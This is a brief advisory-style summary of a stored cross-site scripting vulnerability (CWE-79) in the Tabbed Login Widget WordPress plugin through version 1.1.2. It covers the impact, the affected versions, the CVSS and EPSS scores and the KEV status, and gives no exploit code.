Stored Cross‑Site Scripting (XSS) vulnerabilities allow an attacker to inject malicious scripts that are later served to all users who visit the affected page. In the Tabbed Login Widget plugin, malformed input is saved and rendered without sanitization, enabling attackers to capture the victim’s session cookie, deface the site, or redirect users to malicious domains. The flaw is a classic instance of CWE‑79: Improper Neutralization of Input During Web Page Generation.

The affected product is the Tabbed Login Widget plugin developed by Vivek Marakana. All WordPress installations using this plugin at versions 1.1.2 or earlier are susceptible. The CNA description indicates that the vulnerability is present from the earliest release through ≤ 1.1.2.

The CVSS score of 6.5 denotes a moderate severity, and the EPSS score of less than 1% suggests that, at the time of assessment, exploitation is unlikely but not impossible. The vulnerability is not listed in the CISA KEV database, meaning there is no public evidence of active exploitation. Attackers would need to inject malicious payloads through the plugin’s input mechanisms, which can then be executed in the browsers of any visitor. Because the payload is stored, repeated exploitation is possible, and protection against XSS must be applied immediately.